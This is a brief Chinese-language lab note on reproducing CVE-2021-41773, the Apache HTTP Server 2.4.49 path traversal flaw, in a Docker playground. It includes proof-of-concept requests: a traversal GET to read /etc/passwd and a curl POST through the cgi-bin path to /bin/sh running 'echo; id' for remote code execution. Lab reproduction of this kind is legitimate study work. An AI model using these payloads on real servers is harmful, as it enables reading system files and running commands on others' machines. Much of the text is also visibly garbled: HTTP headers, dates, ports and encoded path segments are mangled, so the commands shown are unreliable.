漏洞版本:仅影响Apache http server2.4. 49版
推荐环境: githu B- blasty/CVE-2021-4177: CVE-2021-41773操场
下载后:
如果遇到docker-composebuilddocker-compose up :
进入容器进行修正
添加到vim /etc/apache2/apache2.conf的最后一行:
更改ServerName localhost:80后重新启动:
apachectl restart Poc:
get/icons//.//./etc/passwd http/1.1 host : xx.xx.xx 33608080 cache-control : max-age=0升级地址英特尔like Gecko ) chrome/93.0.4577.82 safari/537.36 accept 3360 tex kit q=0.9,image/avif,image/webp,image/apng,* q=0.8,APP /信号交换; v=b3; q=0.9Accept-Encoding: gzip,deflate accept-language : zh-cn,zh; q=0.9 if-none-match : ' 29cd-5 cdd 3418 a 72 F6-gzip ' if-modified-since : fri,08 oct 202108336035336004 gmtconnened
curl --data 'echo; id ' 3358 xx.xx.xx.xx :8080/CGI-fnd wd/././fnd wd/sh ' post/CGI-fnd wd/./fnd wd 1.1 host : xx.xx
注意:这里需要打开mod_cgid
ls/etc/Apache2/MODS-available/| grep CGI
参考: CVE-2021-41773升华篇-Apache HTTP Server路径跨越漏洞升级为RCE回声进行深入分析